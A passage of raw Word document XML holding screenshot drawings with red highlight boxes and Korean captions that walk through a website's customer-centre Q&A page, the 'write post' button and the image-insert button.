FNH+4sWb8ddO8FvfweL&#10;nwAAAP//AwBQSwMEFAAGAAgAAAAhAOl0OoXgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FO&#10;wzAQRO9I/IO1SNyoQ0KbKsSpUASIA5cUVJWbGy+JRbyOYrcNf89yguPOPM3OlJvZDeKEU7CeFNwu&#10;EhBIrTeWOgXvb083axAhajJ68IQKvjHAprq8KHVh/JkaPG1jJziEQqEV9DGOhZSh7dHpsPAjEnuf&#10;fnI68jl10kz6zOFukGmSrKTTlvhDr0ese2y/tkenIN3Jj/2LbOzYtDXW9tVNj+ZZqeur+eEeRMQ5&#10;/sHwW5+rQ8WdDv5IJohBQZ4tV4yyscx4FBP53ZqVg4IsTxOQVSn/b6h+AAAA//8DAFBLAQItABQA&#10;BgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1s&#10;UEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxz&#10;UEsBAi0AFAAGAAgAAAAhALd//q8iAgAAVgQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2Mu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAOl0OoXgAAAACwEAAA8AAAAAAAAAAAAAAAAAfA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13D221A9" wp14:editId="42C61F59">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4531360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2410460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429318" cy="173124"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394010" name="직사각형 1444394010"/>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5ADF6" id="직사각형 1444394010" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:356.8pt;margin-top:189.8pt;width:33.8pt;height:13.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wuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMk2pWzUbLVqtQip&#10;aita1LPXsTeRHNvY3s0ut/IOSLwBFw48FyrvwNhO0lWpOCD24LUzM9/MfPNzcrptBdowYxslS5wd&#10;pBgxSVXVyFWJP9wuXr3ByDoiKyKUZCXeMYtPZy9fnHS6YBNVK1ExgwBE2qLTJa6d00WSWFqzltgD&#10;pZkEIVemJQ6eZpVUhnSA3opkkqavk06ZShtFmbXw9TwK8Szgc86ou+LcModEiSE2F04TzqU/k9kJ&#10;KVaG6LqhfRjkH6JoSSPB6Qh1ThxBa9P8AdU21CiruDugqk0U5w1lIQfIJkufZHNTE81CLkCO1SNN&#10;9v/B0svNtUFNBbXL8/xwmkMUGEnSQq0evt0/fP7+88f9r69f0J4YOOu0LcD0Rl+b/mXh6gnYctP6&#10;f0gNbQPPu5FntnWIwsd8Mj3MoDEoiLLjw2yS+zokj8baWPeWqRb5S4kNlDGwSzYX1kXVQcX7kmrR&#10;CAHfSSEk6gB0mh6lwcIq0VRe6oXWrJZnwqANgW5YLFL49Y731CAMISEan2JMKtzcTrDo4D3jQBik&#10;MYkefKuyEZZQyqTLoqgmFYvejvadDRYhZyEB0CNziHLE7gEGzQgyYEcGen1vykKnj8Z96n8zHi2C&#10;ZyXdaNw2UpnnMhOQVe856g8kRWo8S0tV7aCdjIpzZjVdNFDBC2LdNTEwWNBbsCzcFRxcKKiU6m8Y&#10;1cp8eu6714d+BylGHQxqie3HNTEMI/FOwiRMoTP9ZIdHfnQ8gYfZlyz3JXLdnimofgZrSdNw9fpO&#10;DFduVHsHO2XuvYKISAq+S0ydGR5nLi4Q2EqUzedBDaZZE3chbzT14J5V36G32ztidN/GDvr/Ug1D&#10;TYon3Rx1vaVU87VTvAmt/shrzzdsgtA4/dbyq2b/HbQed+vsNwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;AP8l1W/hAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj01Pg0AQhu8m/ofNmHizC1sDFBkaNTFG&#10;04NWvW/ZLZDuB2G3gP/e8aS3mcyTd5632i7WsEmPofcOIV0lwLRrvOpdi/D58XRTAAtROiWNdxrh&#10;WwfY1pcXlSyVn927nvaxZRTiQikRuhiHkvPQdNrKsPKDdnQ7+tHKSOvYcjXKmcKt4SJJMm5l7+hD&#10;Jwf92OnmtD9bhDd/OnLzJcRr/vAs8hdbzO20Q7y+Wu7vgEW9xD8YfvVJHWpyOvizU4EZhDxdZ4Qi&#10;rPMNDUTkRSqAHRBuk2wDvK74/w71DwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAg/dtw&#10;uAIAAKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD/&#10;JdVv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765760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CCE441B" wp14:editId="45AD70C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4455160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>764540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429260" cy="172720"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394011" name="직사각형 1444394011"/>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87A28" id="직사각형 1444394011" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:350.8pt;margin-top:60.2pt;width:33.8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6twIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdL2pKomypqFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3kHJN6ACweeC5V3YOz9aVQqDogcHHtn5hvPN5/n5HRbK7IR1lWgczo6&#10;SCkRmkNR6VVOP9wuXr2hxHmmC6ZAi5zuhKOns5cvThozFRmUoAphCYJoN21MTkvvzTRJHC9FzdwB&#10;GKHRKMHWzOPRrpLCsgbRa5VkaXqUNGALY4EL5/DreWuks4gvpeD+SkonPFE5xbv5uNq4LsOazE7Y&#10;dGWZKSveXYP9wy1qVmlMOkCdM8/I2lZ/QNUVt+BA+gMOdQJSVlzEGrCaUfqkmpuSGRFrQXKcGWhy&#10;/w+WX26uLakK7N14PH49GaejESWa1dirh2/3D5+///xx/+vrF7JnRs4a46YYemOubXdyuA0EbKWt&#10;wz+WRraR593As9h6wvHjOJtkR9gNjqbRcXacxT4kj8HGOv9WQE3CJqcW2xjZZZsL5zEhuvYuIZeG&#10;RaVUbKXSpEHQSXqYxggHqiqCNfg5u1qeKUs2DNWwWKT4CwJAtD03PCmNH0OJbVFx53dKBAyl3wuJ&#10;hGEZWZshSFUMsIxzof2oNZWsEG22w/1kfURMHQEDssRbDtgdQO/ZgvTY7Z07/xAqotKH4K70vwUP&#10;ETEzaD8E15UG+1xlCqvqMrf+PUktNYGlJRQ7lJOF9p05wxcVdvCCOX/NLD4sbDoOC3+Fi1SAnYJu&#10;R0kJ9tNz34M/6h2tlDT4UHPqPq6ZFZSodxpfwgSVGV52PIwPg5iI3bcs9y16XZ8Bdh9FjreL2+Dv&#10;Vb+VFuo7nCnzkBVNTHPMnVPubX848+0AwanExXwe3fA1G+Yv9I3hATywGhR6u71j1nQy9qj/S+gf&#10;NZs+UXPrGyI1zNceZBWl/shrxzdOgiicbmqFUbN/jl6Ps3X2GwAA//8DAFBLAwQUAAYACAAAACEA&#10;AT6qKt8AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7Khdq0pKGqcCJIRA&#10;LEqhezeeJlH9iGI3CX/PsILlzD26c6bczs6yEYfYBa9guRDA0NfBdL5R8PX5fLcGFpP2RtvgUcE3&#10;RthW11elLkyY/AeO+9QwKvGx0AralPqC81i36HRchB49ZacwOJ1oHBpuBj1RubNcCpFxpztPF1rd&#10;41OL9Xl/cQp24Xzi9iDlW/74IvNXt56a8V2p25v5YQMs4Zz+YPjVJ3WoyOkYLt5EZhXkYpkRSoEU&#10;K2BE5Nm9BHakzSrPgFcl//9D9QMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB/Ykr6twIA&#10;AKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQABPqoq&#10;3wAAAAsBAAAPAAAAAAAAAAAAAAAAABEFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00553E54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68119D26" wp14:editId="29CC34CC">
            <wp:extent cx="4572000" cy="3938257"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="1444394015" name="그림 144439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091521" w14:textId="22719030" w:rsidR="00553E54" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="_Toc20909464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71</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객센터</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 내 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CF5289">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="00CF5289">
        <w:t>NA</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w14:paraId="6B7C384D" w14:textId="77777777" w:rsidR="00553E54" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1788D8D8" w14:textId="17802592" w:rsidR="00553E54" w:rsidRPr="006739DD" w:rsidRDefault="00332539" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251786240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A2E12B4" wp14:editId="1A1239EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5010151</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2277110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="281940" cy="160020"/>
                <wp:effectExtent l="0" t="0" r="22860" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394023" name="직사각형 1444394023"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2819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D646" id="직사각형 1444394023" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:394.5pt;margin-top:179.3pt;width:22.2pt;height:12.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asStwIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdpWtqomypKFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3mHSrwBFw48FyrvwNj7k6hUHBA5OPbOzDeebz7P2fmmUmQtrCtBZ3Rw&#10;kFIiNIe81MuMfrybvzmhxHmmc6ZAi4xuhaPnk9evzmozFkMoQOXCEgTRblybjBbem3GSOF6IirkD&#10;MEKjUYKtmMejXSa5ZTWiVyoZpulxUoPNjQUunMOvF42RTiK+lIL7aymd8ERlFO/m42rjughrMjlj&#10;46Vlpih5ew32D7eoWKkxaQ91wTwjK1v+AVWV3IID6Q84VAlIWXIRa8BqBumzam4LZkSsBclxpqfJ&#10;/T9YfrW+saTMsXej0ejwdJQODynRrMJePX17ePry/eePh19fH8meGTmrjRtj6K25se3J4TYQsJG2&#10;Cv9YGtlEnrc9z2LjCcePw5MBJqKEo2lwnKbD2IdkF2ys8+8EVCRsMmqxjZFdtr50HhOia+cScmmY&#10;l0rFVipNagQ9TY/SGOFAlXmwBj9nl4uZsmTNUA3zeYq/IABE23PDk9L4MZTYFBV3fqtEwFD6g5BI&#10;WCijyRCkKnpYxrnQftCYCpaLJtvRfrIuIqaOgAFZ4i177Bag82xAOuzmzq1/CBVR6X1wW/rfgvuI&#10;mBm074OrUoN9qTKFVbWZG/+OpIaawNIC8i3KyULzzpzh8xI7eMmcv2EWHxY2HYeFv8ZFKsBOQbuj&#10;pAD7+aXvwR/1jlZKanyoGXWfVswKStR7jS/hFJUZXnY8jI7eopiI3bcs9i16Vc0Auz/AsWR43AZ/&#10;r7qttFDd40yZhqxoYppj7oxyb7vDzDcDBKcSF9NpdMPXbJi/1LeGB/DAalDo3eaeWdPK2KP+r6B7&#10;1Gz8TM2Nb4jUMF15kGWU+o7Xlm+cBFE47dQKo2b/HL12s3XyGwAA//8DAFBLAwQUAAYACAAAACEA&#10;qGGz3OAAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU+EMBCF7yb+h2ZMvLlF0KUiZaMmxmg8&#10;6Kr3LswC2XZKaBfw3zue9Pjmvbz5XrlZnBUTjqH3pOFylYBAqn3TU6vh8+PxQoEI0VBjrCfU8I0B&#10;NtXpSWmKxs/0jtM2toJLKBRGQxfjUEgZ6g6dCSs/ILG396MzkeXYymY0M5c7K9MkWUtneuIPnRnw&#10;ocP6sD06DW/+sJf2K01f8vunNH92am6nV63Pz5a7WxARl/gXhl98RoeKmXb+SE0QVkOubnhL1JBd&#10;qzUITqgsuwKx44vKFMiqlP83VD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdt2rErcC&#10;AACjBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAqGGz&#10;3OAAAAALAQAADwAAAAAAAAAAAAAAAAARBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AE38BC" wp14:editId="4844D4F9">
            <wp:extent cx="4572000" cy="2598610"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="11430"/>
            <wp:docPr id="1444394022" name="그림 14443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84" t="17278" r="3014" b="34773"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2598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1CABCE" w14:textId="1F5A3758" w:rsidR="005B34FB" w:rsidRDefault="00553E54" w:rsidP="005B34FB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="_Toc20909464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72</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D77308">
        <w:t xml:space="preserve">QNA </w:t>
      </w:r>
      <w:r w:rsidR="00D77308">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지 </w:t>
      </w:r>
      <w:r w:rsidR="00D77308">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D77308">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>글쓰기</w:t>
      </w:r>
      <w:r w:rsidR="00D77308">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00D77308">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w14:paraId="5970EF30" w14:textId="77777777" w:rsidR="005B34FB" w:rsidRDefault="005B34FB" w:rsidP="005B34FB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056C5498" w14:textId="4DEA0583" w:rsidR="005B34FB" w:rsidRDefault="005B34FB" w:rsidP="005B34FB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251781120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25E2526D" wp14:editId="13AB1DD1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2660245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1300538</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="200891" cy="173182"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394029" name="직사각형 1444394029"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="200891"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19AD" id="직사각형 1444394029" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:209.45pt;margin-top:102.4pt;width:15.8pt;height:13.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FHtgIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdpCs2qmypqFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3kHJN6ACweeC5V3YOz9aVQqDogcHHtn5puZb35OTre1IhthXQU6p6OD&#10;lBKhORSVXuX0w+3i1TElzjNdMAVa5HQnHD2dvXxx0phMjKEEVQhLEES7rDE5Lb03WZI4XoqauQMw&#10;QqNQgq2Zx6ddJYVlDaLXKhmn6eukAVsYC1w4h1/PWyGdRXwpBfdXUjrhicopxubjaeO5DGcyO2HZ&#10;yjJTVrwLg/1DFDWrNDodoM6ZZ2Rtqz+g6opbcCD9AYc6ASkrLmIOmM0ofZLNTcmMiLkgOc4MNLn/&#10;B8svN9eWVAXWbjKZHE4n6XhKiWY11urh2/3D5+8/f9z/+vqF7ImRs8a4DE1vzLXtXg6vgYCttHX4&#10;x9TINvK8G3gWW084fsTCHU9HlHAUjd4cjo7HoQ7Jo7Gxzr8VUJNwyanFMkZ22ebC+Va1Vwm+NCwq&#10;pfA7y5QmDYJO06M0WjhQVRGkQejsanmmLNkw7IbFIsVf53hPDcNQGqMJKbZJxZvfKdE6eC8kEhbS&#10;aD2EVhUDLONcaD9qRSUrROvtaN9ZbxFzVhoBA7LEKAfsDqDXbEF67JaBTj+Yitjpg3GX+t+MB4vo&#10;GbQfjOtKg30uM4VZdZ5b/Z6klprA0hKKHbaThXbOnOGLCit4wZy/ZhYHC0cQl4W/wkMqwEpBd6Ok&#10;BPvpue9BH/sdpZQ0OKg5dR/XzApK1DuNkzDFzgyTHR+TozdjfNh9yXJfotf1GWD1sfswungN+l71&#10;V2mhvsOdMg9eUcQ0R9855d72jzPfLhDcSlzM51ENp9kwf6FvDA/ggdXQobfbO2ZN18Ye+/8S+qFm&#10;2ZNubnWDpYb52oOsYqs/8trxjZsgNk63tcKq2X9HrcfdOvsNAAD//wMAUEsDBBQABgAIAAAAIQBm&#10;z+nU4AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLG3oWClNJ0BCiIkD&#10;bOOeNVlbLXGqJmvL22NOcLT96ff3l+vZWTaaIXQeJaSLBJjB2usOGwn73ctNDixEhVpZj0bCtwmw&#10;ri4vSlVoP+GnGbexYRSCoVAS2hj7gvNQt8apsPC9Qbod/eBUpHFouB7UROHOcpEkd9ypDulDq3rz&#10;3Jr6tD07CR/+dOT2S4jN6ulVrN5cPjXju5TXV/PjA7Bo5vgHw68+qUNFTgd/Rh2YlZCl+T2hEkSS&#10;UQcismWyBHagza1IgVcl/9+h+gEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAwgEFHtgIA&#10;AKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBmz+nU&#10;4AAAAAsBAAAPAAAAAAAAAAAAAAAAABAFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E7D1C4" wp14:editId="26A387BC">
            <wp:extent cx="4572000" cy="1728120"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="7368240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3982" t="10344" r="24300" b="52865"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="172812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AF904" w14:textId="2705E30E" w:rsidR="005B34FB" w:rsidRPr="005B34FB" w:rsidRDefault="005B34FB" w:rsidP="005B34FB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc209094646"/>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73</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이미지 삽입 버튼 클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w14:paraId="68E4A471" w14:textId="2D49A006" w:rsidR="003543E2" w:rsidRDefault="003543E2" w:rsidP="003543E2">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251811840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63189D35" wp14:editId="6A9B0299">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4343745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4202372</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="415059" cy="207818"/>
                <wp:effectExtent l="0" t="0" r="23495" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394028" name="직사각형 1444394028"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="415059"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0CD87" id="직사각형 1444394028" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:342.05pt;margin-top:330.9pt;width:32.7pt;height:16.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z+uAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDchoU3UTRW1CkKq&#10;2ogW9ex47exKXo+xnWzCrbwDEm/AhQPPhco7MPb+NCoVB8QevLZn5hvPNz+nZ7tKka2wrgSd0cFR&#10;SonQHPJSrzP64Xbx6oQS55nOmQItMroXjp7NXr44rc1UDKEAlQtLEES7aW0yWnhvpknieCEq5o7A&#10;CI1CCbZiHo92neSW1YheqWSYpm+SGmxuLHDhHN5eNEI6i/hSCu6vpXTCE5VRfJuPq43rKqzJ7JRN&#10;15aZouTtM9g/vKJipUanPdQF84xsbPkHVFVyCw6kP+JQJSBlyUWMAaMZpE+iuSmYETEWJMeZnib3&#10;/2D51XZpSZlj7kaj0evJKB1ixjSrMFcP3+4fPn//+eP+19cv5ECMnNXGTdH0xixte3K4DQTspK3C&#10;H0Mju8jzvudZ7DzheDkajNPxhBKOomF6fDI4CXlIHo2Ndf6tgIqETUYtpjGyy7aXzjeqnUrwpWFR&#10;KoX3bKo0qTGWSTpOo4UDVeZBGoTOrlfnypItw2pYLFL8WscHavgMpfE1IcQmqLjzeyUaB++FRMIw&#10;jGHjIZSq6GEZ50L7QSMqWC4ab+NDZ51FjFlpBAzIEl/ZY7cAnWYD0mE3DLT6wVTESu+N29D/Ztxb&#10;RM+gfW9clRrsc5EpjKr13Oh3JDXUBJZWkO+xnCw0feYMX5SYwUvm/JJZbCxsQRwW/hoXqQAzBe2O&#10;kgLsp+fugz7WO0opqbFRM+o+bpgVlKh3GjthgpUZOjseRuPjIR7soWR1KNGb6hww+wMcS4bHbdD3&#10;qttKC9UdzpR58Ioipjn6zij3tjuc+2aA4FTiYj6PatjNhvlLfWN4AA+shgq93d0xa9oy9lj/V9A1&#10;NZs+qeZGN1hqmG88yDKW+iOvLd84CWLhtFMrjJrDc9R6nK2z3wAAAP//AwBQSwMEFAAGAAgAAAAh&#10;ABkGx7nhAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPhDAQhe8m/odmTLy5BcICy1I2amKM&#10;xoOu7r1Lu0C2nRLaBfz3jie9zcx7efO9ardYwyY9+t6hgHgVAdPYONVjK+Dr8+muAOaDRCWNQy3g&#10;W3vY1ddXlSyVm/FDT/vQMgpBX0oBXQhDyblvOm2lX7lBI2knN1oZaB1brkY5U7g1PImijFvZI33o&#10;5KAfO92c9xcr4N2dT9wckuQ1f3hO8hdbzO30JsTtzXK/BRb0Ev7M8ItP6FAT09FdUHlmBGRFGpOV&#10;hiymDuTI080a2JEum3QNvK74/w71DwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCYJkz+&#10;uAIAAKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAZ&#10;Bse5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806720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="500A16DE" wp14:editId="57BF967A">
